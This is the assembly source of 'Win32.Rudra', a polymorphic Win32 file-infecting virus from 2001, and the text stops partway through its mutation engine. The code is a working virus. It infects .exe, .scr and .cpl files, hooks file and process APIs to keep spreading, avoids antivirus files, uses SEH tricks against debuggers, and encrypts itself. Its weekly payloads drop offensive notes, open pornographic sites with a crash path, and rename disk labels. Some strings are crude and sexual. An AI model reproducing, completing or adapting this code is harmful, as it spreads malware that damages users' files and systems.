; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ; Ä< Win32.Rudra >Ä ; Designed by LiteSys ; ; This is Rudra, my first polymorphic virus. It's a direct action (with ; directory backwards navigation) and a per-process resident virus. Hooks ; the following APIs: CreateProcessA, WinExec, CreateFileA, OpenFileA, ; CopyFileA, MoveFileA, _lopen. ; ; To say that the poly engine is stupid is an appropiate metaphor, the ; reasons are obvious: the decryption opcodes are fixed and in a fixed ; position in the decryptor, so it would be very easy to the avers to ; detect it using mask. I used two encryption layers (maybe it's a very bad ; implemented idea), being the first the polymorphic one. ; It's the first poly engine i've written so far, and I didn't have any ; other poly code so I think many concepts are still unclear in my mind. ; But next will be better, promised. ; ; The infection algorithm is, obviously, last section expanding, I really ; don't care about overwriting the .reloc section, albeit it's never used, ; I let it alone... ; ; This virus has multiple payloads. Executed every sabbath, consists in ; executing one of the three following payloads: ; ; + Creates some stupid named directories on the root directory with a ; little offensive note in spanish. ; + Browses to some Venezuelan XXX sites (I included a lame C:\con\con to ; hang up some idiots). ; + Sets the hard disk label with some offensive stuff. ; ; This virus uses SEH to generate an exception and to trap any possible ; exceptions. ; ; Don't ask me why that name, it came from nothing... hehe. Ok, ok, ok, ; you get a prize if you guess where did this name came from! ; ; By the way, this is another shitty virus written by me... don't expect ; too much stability or optimization 'cause I don't have time to spend ; with it... ; ; So, in resume, this virus has: ; ; + Per-Process Residence ; + Direct Action Infection with directory backwards navigation ; + Last section infection ; + Avoids infecting some "suspicious" AV-like files ; + SEH for antidebugging purposes ; + SEH for stability purposes ; + Two layers of encryption, first one is polymorphic ; + Simple, lame and weak polymorphism ; + Multiple Payloads ; + Does other stuff. ; + Virus Size: 5392 bytes. ; ; So, I don't have anything else to say about this shit, maybe greets, yeah ; greets are gewd and go to: Mindlock, Knight-7, Evul, Gigabyte, Tokugawa, ; Maquiavelo, Thorndike and everybody I forgot... hope you forgive me =P. ; ; LiteSys. ; "Patria o Muerte: Venceremos" (Ernesto "Che" Guevara) ; Venezuela, Junio/Julio 2001 ; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ .386 .MODEL FLAT, STDCALL LOCALS INCLUDE C:\TOOLS\TASM\INCLUDE\WIN32API.INC INCLUDE C:\TOOLS\TASM\INCLUDE\WINDOWS.INC EXTRN ExitProcess:PROC EXTRN MessageBoxA:PROC .DATA Tama¤o_Virus EQU (Termina_Virus - Empieza_Virus) Tama¤o_Decrip EQU (Empieza_Virus - Rudra) Tama¤o_Total EQU (Tama¤o_Decrip + Tama¤o_Virus) Tama¤o_Layer2 EQU (Termina_Virus - Empieza_Layer2) APICALL MACRO APIx CALL DWORD PTR [EBP][APIx] ENDM OFS EQU BY EQU WO EQU DWO EQU PAGINAS EQU <32h> KERNEL_9X EQU <0BFF70000h> GPA_9X EQU <0BFF76DACh> CRLF EQU <0Dh, 0Ah> RDTSC EQU SYSTEMTIME STRUC wYear DW 0000h wMonth DW 0000h wDayOfWeek DW 0000h wDay DW 0000h wHour DW 0000h wMinute DW 0000h wSecond DW 0000h wMilliseconds DW 0000h SYSTEMTIME ENDS Titulo DB "-=( Rudra )=-", 00h Ventana DB "Virus 'Rudra' por LiteSys", CRLF DB "Primera Generacion!", CRLF, CRLF DB "Tamaño total del virus: " DB Tama¤o_Total / 1000 MOD 10 + 30h DB Tama¤o_Total / 0100 MOD 10 + 30h DB Tama¤o_Total / 0010 MOD 10 + 30h DB Tama¤o_Total / 0001 MOD 10 + 30h DB CRLF DB 00h .CODE Rudra: DB 24d DUP (90h) ; los bloques son llenados con la basura del poly CALL Delta Delta: DB 24d DUP (90h) POP EBP DB 24d DUP (90h) SUB EBP, OFFSET Delta DB 24d DUP (90h) LEA EDI, OFS [Empieza_Virus] DB 24d DUP (90h) MOV ECX, Tama¤o_Virus / 4 DB 24d DUP (90h) @KZ: XOR DWORD PTR [EDI], 00000000h DB 27d DUP (90h) ADD EDI, 00000004h DB 24d DUP (90h) LOOP @KZ Empieza_Virus LABEL NEAR MOV ECX, Tama¤o_Layer2 / 2 LEA EDI, OFS [Empieza_Layer2] @DCL2: SUB WORD PTR [EDI], "HO" ORG $-2 Llave_II DW 0000h ADD EDI, 02d LOOP @DCL2 Empieza_Layer2 LABEL NEAR JMP @@1 DB " [RUDRA] " @@1: MOV EDI, DWORD PTR [ESP] PUSHAD CALL @Seh_1 MOV ESP, [ESP+8h] XOR EAX, EAX POP DWORD PTR FS:[EAX] POP EAX POPAD JMP @SigueCodigo @Seh_1: XOR EAX, EAX PUSH DWORD PTR FS:[EAX] MOV FS:[EAX], ESP DEC BYTE PTR [EAX] @SigueCodigo: CALL @Seh_2 MOV ESP, [ESP+8h] XOR EAX, EAX POP DWORD PTR FS:[EAX] POP EAX JMP @Finale @Seh_2: XOR EAX, EAX PUSH DWORD PTR FS:[EAX] MOV FS:[EAX], ESP CALL @Mardito @Mardito: POP EAX SUB EAX, "HOHO" ORG $-4 El_EIP DD 00001000h SUB EAX, (@Mardito - Rudra) MOV DWO [IBase], EAX CALL Obtener_K32 MOV EBX, EAX CALL Obtener_GPA MOV EBX, DWO [KERNEL32] LEA EDI, OFS [APIs_KERNEL32] LEA ESI, OFS [LoadLibraryA] CALL Obtener_APIs LEA EAX, OFS [Directorio_Inicial] PUSH EAX PUSH MAX_PATH APICALL GetCurrentDirectoryA @Busca_Primero: LEA EAX, OFS [Busqueda] PUSH EAX LEA EAX, OFS [Archivos] PUSH EAX APICALL FindFirstFileA MOV DWO [SHandle], EAX INC EAX JZ @Nada @La_Recluta: LEA EDI, OFS [Busqueda.wfd_szFileName] XOR EAX, EAX SCASB JNZ $-1 MOV EAX, DWORD PTR [EDI-5h] OR EAX, 20202020h CMP EAX, "exe." ; *.exe JE @Enchufalo CMP EAX, "rcs." ; *.scr JE @Enchufalo CMP EAX, "lpc." ; *.cpl JE @Enchufalo @Busca_Proximo: LEA EAX, OFS [Busqueda] PUSH EAX PUSH DWO [SHandle] APICALL FindNextFileA OR EAX, EAX JNZ @La_Recluta PUSH DWO [SHandle] APICALL FindClose @Nada: LEA EAX, OFS [PaTras] PUSH EAX APICALL SetCurrentDirectoryA LEA EAX, OFS [Busqueda.wfd_szFileName] PUSH EAX PUSH MAX_PATH APICALL GetCurrentDirectoryA CMP EAX, DWO [Virgo] JE @Fin_DA MOV DWO [Virgo], EAX JMP @Busca_Primero @Fin_DA: LEA EAX, OFS [Directorio_Inicial] PUSH EAX APICALL SetCurrentDirectoryA CALL Hookear CALL Paylo @Finale: PUSH "HOHO" ORG $-4 Retorno DD OFFSET Host_Falso RET ; 01h -> Create ; 02h -> File ; 03h -> Map ; 04h -> View ; 05h -> Find ; 06h -> Close ; 07h -> Set ; 08h -> Get ; 09h -> Load ; 0Ah -> CurrentDirectory ; 0Bh -> Virtual APIs_KERNEL32 DB 09h, "LibraryA", 00h ; LoadLibraryA DB 01h, 02h, "A", 00h ; CreateFileA DB 01h, 02h, 03h, "pingA", 00h ; CreateFileMappingA DB 03h, 04h, "Of", 02h, 00h ; MapViewOfFile DB "Unmap", 04h, "Of", 02h, 00h; UnmapViewOfFile DB 06h, "Handle", 00h ; CloseHandle DB 05h, "First", 02h, "A", 00h ; FindFirstFileA DB 05h, "Next", 02h, "A", 00h ; FindNextFileA DB 05h, 06h, 00h ; FindClose DB 07h, 02h, "AttributesA", 00h; SetFileAttributesA DB 08h, 02h, "Size", 00h ; GetFileSize DB 07h, 02h, "Pointer", 00h ; SetFilePointer DB 07h, "EndOf", 02h, 00h ; SetEndOfFile DB 08h, 0Ah, "A", 00h ; GetCurDirA DB 07h, 0Ah, "A", 00h ; SetCurDirA DB 08h, "TickCount", 00h ; GetTickCount DB 08h, "SystemTime", 00h ; GetSystemTime DB "_lopen", 00h ; _lopen DB "Open", 02h, "A", 00h ; OpenFileA DB "Move", 02h, "A", 00h ; MoveFileA DB "Copy", 02h, "A", 00h ; CopyFileA DB 01h, "ProcessA", 00h ; CreateProcessA DB "WinExec", 00h ; WinExec DB 0Bh, "Alloc", 00h ; VirtualAlloc DB 0Bh, "Free", 00h ; VirtualFree DB 01h, "DirectoryA", 00h ; CreateDirA DB "_lcreat", 00h DB "_lwrite", 00h DB 07h, "VolumeLabelA", 00h DB 0FFh LoadLibraryA DD 00000000h CreateFileA DD 00000000h CreateFileMappingA DD 00000000h MapViewOfFile DD 00000000h UnmapViewOfFile DD 00000000h CloseHandle DD 00000000h FindFirstFileA DD 00000000h FindNextFileA DD 00000000h FindClose DD 00000000h SetFileAttributesA DD 00000000h GetFileSize DD 00000000h SetFilePointer DD 00000000h SetEndOfFile DD 00000000h GetCurrentDirectoryA DD 00000000h SetCurrentDirectoryA DD 00000000h GetTickCount DD 00000000h GetSystemTime DD 00000000h _lopen DD 00000000h OpenFileA DD 00000000h MoveFileA DD 00000000h CopyFileA DD 00000000h CreateProcessA DD 00000000h WinExec DD 00000000h VirtualAlloc DD 00000000h VirtualFree DD 00000000h CreateDirectoryA DD 00000000h _lcreat DD 00000000h _lwrite DD 00000000h SetVolumeLabelA DD 00000000h IBase DD 00000000h Firma DB "-=( RUDRA )=-", 0Dh, 0Ah @Enchufalo: LEA EBX, OFS [Busqueda.wfd_szFileName] CALL Infectar_PE JMP @Busca_Proximo Fecha SYSTEMTIME <> Busqueda DB SIZEOF_WIN32_FIND_DATA DUP (00h) Archivos DB "*.???", 00h PaTras DB "..", 00h SHandle DD 00000000h Virgo DD 00000000h KERNEL32 DD 00000000h Directorio_Inicial DB MAX_PATH DUP (00h) ; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ; Proceso para obtener la base de K32 y GetProcAddress. ; ; EDI -> Doble Palabra apuntada por ESP que representa el ; call... Obtener_K32 PROC AND EDI, 0FFFF0000h PUSH PAGINAS POP ECX @Revisa_K32: PUSH EDI CMP BYTE PTR [EDI], "M" JNE @Proximo_K32 ADD EDI, [EDI+3Ch] CMP BYTE PTR [EDI], "P" JE @Encontrado_K32 @Proximo_K32: POP EDI SUB EDI, 1000h LOOP @Revisa_K32 @Encontrado_K32: POP EAX MOV DWO [KERNEL32], EAX RET Obtener_K32 ENDP DB 10h DUP (90h) ; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ; Proceso para obtener la base de GetProcAddress ; ; EBX -> Base de KERNEL32. Obtener_GPA PROC MOV ESI, EBX ADD ESI, DWORD PTR [ESI+3Ch] MOV ESI, DWORD PTR [ESI+78h] ADD ESI, EBX ; Obtiene tabla de exportaciones. MOV DWO [EXPORTS], ESI MOV ECX, DWORD PTR [ESI+18h] DEC ECX MOV ESI, DWORD PTR [ESI+20h] ADD ESI, EBX XOR EAX, EAX @Busca: MOV EDI, DWORD PTR [ESI] ADD EDI, EBX PUSH ESI LEA ESI, OFS [GPA] PUSH ECX PUSH Largo_GPA POP ECX REP CMPSB JE @Encontrado_GPA POP ECX INC EAX POP ESI ADD ESI, 4h LOOP @Busca JMP @Hardcode @Encontrado_GPA: POP ESI POP ECX MOV EDI, DWO [EXPORTS] ADD EAX, EAX MOV ESI, DWORD PTR [EDI+24h] ADD ESI, EBX ADD ESI, EAX MOVZX EAX, WORD PTR [ESI] IMUL EAX, EAX, 4h MOV ESI, DWORD PTR [EDI+1Ch] ADD ESI, EBX ADD ESI, EAX MOV EAX, DWORD PTR [ESI] ADD EAX, EBX MOV DWO [GetProcAddress], EAX RET @Hardcode: PUSH GPA_9X POP EAX MOV DWO [GetProcAddress], EAX RET EXPORTS DD 00000000h GPA DB "GetProcAddress", 00h Largo_GPA EQU $-GPA GetProcAddress DD 00000000h Obtener_GPA ENDP ; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ; Proceso para obtener y desempaquetar las APIs ; ; EBX -> Modulo. ; EDI -> Cadenas de las APIs (empaquetadas). ; ESI -> DWORDs para guardar las rvas. Obtener_APIs PROC ; 01h -> Create ; 02h -> File ; 03h -> Map ; 04h -> View ; 05h -> Find ; 06h -> Close ; 07h -> Set ; 08h -> Get ; 09h -> Load ; 0Ah -> CurrentDirectory ; 0Bh -> Virtual PUSHAD MOV DWO [PaGuardar], ESI XCHG ESI, EDI @OA1: LEA EDI, OFS [API_Trabajo] @OA2: CMP BYTE PTR [ESI], 00h JE @OA4 LODSB CMP AL, 0Bh JA @OA3 XOR ECX, ECX MOV CL, AL PUSH ESI LEA ESI, OFS [API_Packer] @OA5: INC ESI CMP BYTE PTR [ESI], 00h JNZ @OA5 LOOP @OA5 INC ESI @OA6: MOVSB CMP BYTE PTR [ESI], 00h JNZ @OA6 POP ESI JMP @OA2 @OA3: STOSB JMP @OA2 @OA4: XOR AL, AL STOSB LEA EAX, OFS [API_Trabajo] PUSH EAX PUSH EBX APICALL GetProcAddress PUSH ESI MOV ESI, DWO [PaGuardar] MOV DWORD PTR [ESI], EAX ADD ESI, 4h MOV DWO [PaGuardar], ESI POP ESI INC ESI CMP BYTE PTR [ESI], 0FFh JNZ @OA1 @OA7: POPAD RET API_Trabajo DB 32 DUP (00h) PaGuardar DD 00000000h API_Packer DB ":)", 00h DB "Create", 00h DB "File", 00h DB "Map", 00h DB "View", 00h DB "Find", 00h DB "Close", 00h DB "Set", 00h DB "Get", 00h DB "Load", 00h DB "CurrentDirectory", 00h DB "Virtual", 00h ; 01h -> Create ; 02h -> File ; 03h -> Map ; 04h -> View ; 05h -> Find ; 06h -> Close ; 07h -> Set ; 08h -> Get ; 09h -> Load ; 0Ah -> CurrentDirectory ; 0Bh -> Virtual Obtener_APIs ENDP ; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ; Proceso para infectar un archivo PE. ; EBX -> Nombre del archivo. Infectar_PE PROC PUSHAD PUSH DWO [Retorno] POP DWO [EP_Viejo] MOV EAX, DWORD PTR [EBX] OR EAX, 20202020h LEA ESI, OFS [Bad_Dwords] @Rev_BadDW: CMP EAX, DWORD PTR [ESI] JE @Fin_IPE ADD ESI, 4h CMP BYTE PTR [ESI], 0FFh JNE @Rev_BadDW @Rev_BadW: INC ESI CMP AX, WORD PTR [ESI] JE @Fin_IPE ADD ESI, 2h CMP BYTE PTR [ESI], 0FFh JNE @Rev_BadW PUSH FILE_ATTRIBUTE_NORMAL PUSH EBX APICALL SetFileAttributesA XOR EAX, EAX PUSH EAX PUSH FILE_ATTRIBUTE_NORMAL PUSH OPEN_EXISTING PUSH EAX PUSH EAX PUSH GENERIC_READ + GENERIC_WRITE PUSH EBX APICALL CreateFileA MOV DWO [FHandle], EAX INC EAX JZ @Fin_IPE DEC EAX XOR EBX, EBX PUSH EBX PUSH EAX APICALL GetFileSize MOV DWO [Tama¤o], EAX INC EAX JZ @Fin_IPE DEC EAX ADD EAX, Tama¤o_Total+1000h MOV DWO [Tama¤o2], EAX XOR EBX, EBX PUSH EBX PUSH EAX PUSH EBX PUSH PAGE_READWRITE PUSH EBX PUSH DWO [FHandle] APICALL CreateFileMappingA MOV DWO [MHandle], EAX OR EAX, EAX JZ @Cierra_FHandle XOR EBX, EBX PUSH DWO [Tama¤o2] PUSH EBX PUSH EBX PUSH FILE_MAP_WRITE PUSH EAX APICALL MapViewOfFile MOV DWO [BaseMap], EAX OR EAX, EAX JZ @Cierra_MHandle MOV EDI, EAX MOV BX, WORD PTR [EDI] AND BX, 9473h XOR BX, 1041h ; 'ZM' & 9473h == 1014h JNZ @Cierra_BaseMap ADD EDI, [EDI+3Ch] MOV BX, WORD PTR [EDI] OR BX, 1218h ; 'EP' | 1218h == 5758h XOR BX, 5758h JNZ @Cierra_BaseMap CMP DWORD PTR [EDI+4Ch], " XSL" JE @Cierra_BaseMap MOV DWORD PTR [EDI+4Ch], " XSL" MOV ESI, EDI ADD ESI, 18h MOVZX EAX, WORD PTR [EDI+14h] ADD ESI, EAX XOR EDX, EDX MOVZX EDX, WORD PTR [EDI+06h] DEC EDX IMUL EDX, EDX, 28h ADD ESI, EDX ; secciones. MOV EBX, 0A0000020h OR DWORD PTR [ESI+24h], EBX ; atributos. MOV EAX, DWORD PTR [ESI+8h] PUSH EAX ADD EAX, Tama¤o_Total MOV DWORD PTR [ESI+8h], EAX MOV EBX, DWORD PTR [EDI+3Ch] XOR EDX, EDX DIV EBX INC EAX MUL EBX MOV DWORD PTR [ESI+10h], EAX POP EDX MOV EAX, DWORD PTR [EDI+28h] MOV EBX, DWORD PTR [EDI+34h] ADD EAX, EBX MOV DWO [Retorno], EAX ADD EDX, DWORD PTR [ESI+0Ch] MOV DWORD PTR [EDI+28h], EDX MOV DWO [El_EIP], EDX MOV EAX, DWORD PTR [ESI+10h] ADD EAX, DWORD PTR [ESI+0Ch] MOV DWORD PTR [EDI+50h], EAX MOV EDI, DWORD PTR [ESI+14h] ADD EDI, DWORD PTR [ESI+8h] MOV ECX, Tama¤o_Virus SUB EDI, Tama¤o_Total ADD EDI, DWO [BaseMap] CALL RUMEN PUSH DWO [Tama¤o2] POP DWO [Tama¤o] MOV EAX, EDI SUB EAX, DWO [BaseMap] MOV ECX, DWO [Tama¤o] SUB ECX, EAX OR ECX, ECX JB @Cierra_BaseMap XOR EAX, EAX REP STOSB ; meramente estetico. @Cierra_BaseMap: PUSH DWO [BaseMap] APICALL UnmapViewOfFile @Cierra_MHandle: XOR EBX, EBX PUSH EBX PUSH EBX PUSH DWO [Tama¤o] PUSH DWO [FHandle] APICALL SetFilePointer PUSH DWO [FHandle] APICALL SetEndOfFile PUSH DWO [MHandle] APICALL CloseHandle @Cierra_FHandle: PUSH DWO [FHandle] APICALL CloseHandle @Fin_IPE: PUSH DWO [EP_Viejo] POP DWO [Retorno] POPAD RET FHandle DD 00000000h MHandle DD 00000000h BaseMap DD 00000000h Tama¤o DD 00000000h Tama¤o2 DD 00000000h SizeOfRawData DD 00000000h EP_Viejo DD 00000000h Bad_DWords DB "defr" ; defrag DB "scan" ; scandisk DB "anti" DB "rund" DB 0FFh Bad_Words DB "av" DB "sc" DB "tb" DB "f-" DB "no" DB "00" DB "aa" DB 0FFh Infectar_PE ENDP ; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ DB "[" XOR 33h DB "D" XOR 33h DB "e" XOR 33h DB "s" XOR 33h DB "i" XOR 33h DB "g" XOR 33h DB "n" XOR 33h DB "e" XOR 33h DB "d" XOR 33h DB " " XOR 33h DB "b" XOR 33h DB "y" XOR 33h DB " " XOR 33h DB "L" XOR 33h DB "i" XOR 33h DB "t" XOR 33h DB "e" XOR 33h DB "S" XOR 33h DB "y" XOR 33h DB "s" XOR 33h DB "]" XOR 33h DB 33h DB 0Dh XOR 33h DB 0Ah XOR 33h DB "(" XOR 33h DB "c" XOR 33h DB ")" XOR 33h DB " " XOR 33h DB "J" XOR 33h DB "u" XOR 33h DB "n" XOR 33h DB "i" XOR 33h DB "o" XOR 33h DB "/" XOR 33h DB "J" XOR 33h DB "u" XOR 33h DB "l" XOR 33h DB "i" XOR 33h DB "o" XOR 33h DB " " XOR 33h DB "2" XOR 33h DB "0" XOR 33h DB "0" XOR 33h DB "1" XOR 33h DB " " XOR 33h DB "-" XOR 33h DB " " XOR 33h DB "H" XOR 33h DB "e" XOR 33h DB "c" XOR 33h DB "h" XOR 33h DB "o" XOR 33h DB " " XOR 33h DB "e" XOR 33h DB "n" XOR 33h DB " " XOR 33h DB "V" XOR 33h DB "e" XOR 33h DB "n" XOR 33h DB "e" XOR 33h DB "z" XOR 33h DB "u" XOR 33h DB "e" XOR 33h DB "l" XOR 33h DB "a" XOR 33h DB "!" XOR 33h DB 33h ; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ; Proceso para hookear las APIs, residencia por procesos pues... Hookear PROC PUSHAD LEA EDI, OFS [A_CreateFileA] PUSH "nrek" POP DWO [PString] @Hook_Una: PUSH EDI CALL @Obtener_Import POP EDI OR EAX, EAX JZ @ProxAPI2 XOR AL, AL SCASB JNZ $-1 MOV EAX, DWORD PTR [EDI] ADD EAX, EBP MOV DWORD PTR [EBX], EAX @ProxAPI: ADD EDI, 4h CMP BYTE PTR [EDI], 0FFh JNZ @Hook_Una @Fin_Hookear: POPAD RET @ProxAPI2: XOR AL, AL SCASB JNZ $-1 JMP @ProxAPI A_CreateFileA DB "CreateFileA", 00h I_CreateFileA DD (@Hook_CreateFileA) A_OpenFileA DB "OpenFileA", 00h I_OpenFileA DD (@Hook_OpenFileA) A_MoveFileA DB "MoveFileA", 00h I_MoveFileA DD (@Hook_MoveFileA) A_CopyFileA DB "CopyFileA", 00h I_CopyFileA DD (@Hook_CopyFileA) A__lopen DB "_lopen", 00h I__lopen DD (@Hook__lopen) A_CreateProcessA DB "CreateProcessA", 00h I_CreateProcessA DD (@Hook_CreateProcessA) A_WinExec DB "WinExec", 00h I_WinExec DD (@Hook_WinExec) DB 0FFh PString DD 00000000h Cuento DB 00h TString DB 00h @Hook_Comun: PUSHAD PUSHFD MOV EDI, DWORD PTR [ESP+2Ch] MOV EBX, EDI XOR AL, AL SCASB JNZ $-1 MOV EDX, DWORD PTR [EDI-5h] OR EDX, 20202020h CMP EDX, "exe." JZ @InfectaHook CMP EDX, "rcs." JZ @InfectaHook CMP EDX, "lpc." JZ @InfectaHook @Regresa_Hook: POPFD POPAD RET @InfectaHook: CALL Infectar_PE JMP @Regresa_Hook @Hook_CreateFileA: CALL @Hook_Comun JMP DWO [CreateFileA] @Hook_OpenFileA: CALL @Hook_Comun JMP DWO [OpenFileA] @Hook_MoveFileA: CALL @Hook_Comun JMP DWO [MoveFileA] @Hook_CopyFileA: CALL @Hook_Comun JMP DWO [CopyFileA] @Hook__lopen: CALL @Hook_Comun JMP DWO [_lopen] @Hook_CreateProcessA: CALL @Hook_Comun JMP DWO [CreateProcessA] @Hook_WinExec: CALL @Hook_Comun JMP DWO [WinExec] ; Those routines belong to Billy Belcebu's VWG32... @Obtener_Import: PUSH EDI XOR ECX, ECX XOR AL, AL INC ECX SCASB JNE $-2 MOV BY [TString], CL MOV EDI, DWO [IBase] MOV EBX, EDI ADD EDI, [EDI+3Ch] MOV AX, WORD PTR [EDI] XOR AX, 6699h CMP AX, 23C9h ; "EP" ^| 6699h == 23C9h JNE @Fin_OI MOV ESI, DWORD PTR [EDI+7Ch] ADD ESI, DWORD PTR [EDI+80h] ADD ESI, EBX @Rebusca_PString: PUSH ESI MOV ESI, [ESI+0Ch] ADD ESI, EBX MOV EDX, DWORD PTR [ESI] OR EDX, 20202020h CMP EDX, DWO [PString] POP ESI JE @Enco_K32 ADD ESI, 14h JMP @Rebusca_PString @Enco_K32: CMP BYTE PTR [ESI], 00h JE @Fin_OI MOV EDX, [ESI+10h] ADD EDX, EBX AND BY [CUENTO], 00h LODSD OR EAX, EAX JZ @Fin_OI XCHG EDX, EAX ADD EDX, EBX @Ciclo_API: CMP DWORD PTR [EDX], 00000000h JE @Fin_OI CMP BYTE PTR [EDX+3h], 80h JE @Lesigue POP EDI PUSH EDI MOVZX ECX, BY [TString] MOV ESI, DWORD PTR [EDX] ADD ESI, EBX ADD ESI, 2h PUSH ECX REP CMPSB POP ECX JE @Okaza @Lesigue: INC BY [Cuento] ADD EDX, 4h JMP @Ciclo_API @Okaza: ADD ESP, 4d MOVZX EBX, BY [Cuento] IMUL EBX, 4h ADD EBX, EAX MOV EAX, DWORD PTR [EBX] RET @Fin_OI: ADD ESP, 4d XOR EAX, EAX RET Hookear ENDP ; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ Paylo PROC PUSHAD APICALL GetTickCount NEG EAX MOV DWO [Puyado], EAX LEA EAX, OFS [Fecha] PUSH EAX APICALL GetSystemTime CMP WO [Fecha.wDayOfWeek], 6d JNZ @Retorna_Paylo PUSH 00000003h POP EBX CALL @Puyalo OR EAX, EAX JZ @CrearDirectorios CMP EAX, 1d JZ @PonerSitios CMP EAX, 2d JZ @CambiarVolumen @Retorna_Paylo: POPAD RET Directorios DB "\El Guevo", 00h DB "\Fotos Porno", 00h DB "\Sodomia y Otras Perversiones", 00h DB "\Prostitucion de Ni¤as", 00h DB "\Ventas de Cocaina", 00h DB "\Planes de Golpe de Estado", 00h DB "\Facturas de Autos Robados", 00h DB "\Se vende este computador", 00h DB "\Rudra", 00h Idioteces DB "Te meto hasta el fondo!", 00h DB "Toma guevo por curioso", 00h DB "Vamos a jugar keto: vos te agachas, yo te lo meto.", 0Dh, 0Ah DB "O que tal piragua?", 0Dh, 0Ah DB "Y Rinoceronte?", 00h DB "Alarma activada! Alarma activada! Llamando a " DB "la DISIP por modem! acusando por violacion de " DB "los derechos humanos!", 00h DB "La DHEA ha sido contactada... usted esta rodeado.", 00h DB "Andate pa' la puta mierda adeco corrupto sucio culiao.", 00h DB "Mardito sea el que se llevo mi Fairlander!!!", 00h DB "Gracias por activar esta opcion. En este " DB "momento estamos colocando un clasificado en " DB "El Universal para la venta de su computador.", 00h DB "Que? yo? un virus? estas loco? COMO TE ATREVES!", 00h Sitios_Web DB "http://www.sexycaracas.com", 00h DB "http://www.pornocaracas.com", 00h DB "http://www.venezuelaerotica.com", 00h DB "http://www.sexoloco.com", 00h DB "file://C:\con\con", 00h Volumenz DB "Mierda", 00h DB "Sodomia", 00h DB "Mis Nalgas", 00h DB "Gay Tu Papa", 00h DB "Putas", 00h DB "Rudra", 00h @Puyalo: MOV EAX, DWO [Puyado] ADD DWO [Puyado], EAX XOR EDX, EDX DIV EBX XCHG EDX, EAX RET @CrearDirectorios: PUSH 10d POP EBX CALL @Puyalo XCHG ECX, EAX LEA EDI, OFS [Directorios] PUSH ECX XOR AL, AL @CD1: SCASB JNZ @CD1 LOOP @CD1 PUSH NULL PUSH EDI APICALL CreateDirectoryA PUSH EDI APICALL SetCurrentDirectoryA PUSH NULL CALL @CD2 DB "Leeme Por Favor.txt", 00h, 90h @CD2: APICALL _lcreat MOV DWO [FHandle], EAX POP ECX LEA EDI, OFS [Idioteces] XOR AL, AL @CD3: SCASB JNZ @CD3 LOOP @CD3 PUSH EDI XOR ECX, ECX @CD4: INC ECX SCASB JNZ @CD4 POP EDI PUSH ECX PUSH EDI PUSH DWO [FHandle] APICALL _lwrite PUSH DWO [FHandle] APICALL CloseHandle JMP @Retorna_Paylo @PonerSitios: CALL @PS1 DB "SHELL32.DLL", 00h, 90h, 90h @PS1: APICALL LoadLibraryA OR EAX, EAX JZ @Retorna_Paylo CALL @PS2 DB "ShellExecuteA", 00h, 90h, 90h, 90h, 90h @PS2: PUSH EAX APICALL GetProcAddress OR EAX, EAX JZ @Retorna_Paylo PUSH EAX PUSH 05d POP EBX CALL @Puyalo LEA EDI, OFS [Sitios_Web] XCHG ECX, EAX XOR AL, AL @PS3: SCASB JNZ @PS3 LOOP @PS3 POP EAX XOR EBX, EBX PUSH SW_SHOW PUSH EBX PUSH EBX PUSH EDI PUSH EBX PUSH EBX CALL EAX JMP @Retorna_Paylo @CambiarVolumen: PUSH 06d POP EBX CALL @Puyalo XCHG ECX, EAX XOR AL, AL LEA EDI, OFS [Volumenz] @CV1: SCASB JNZ @CV1 PUSH EDI PUSH NULL APICALL SetVolumeLabelA JMP @Retorna_Paylo Puyado DD 00000000h Paylo ENDP ; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ; RUMEN: Rudra Mutation Engine. ; ; EDI -> Donde guardar el virus encriptado. ; ESI -> Codigo a encriptar. ; ECX -> Tama¤o del codigo a encriptar. RUMEN PROC MOV DWO [Guarda_DC], EDI MOV DWO [Tama¤o_EC], 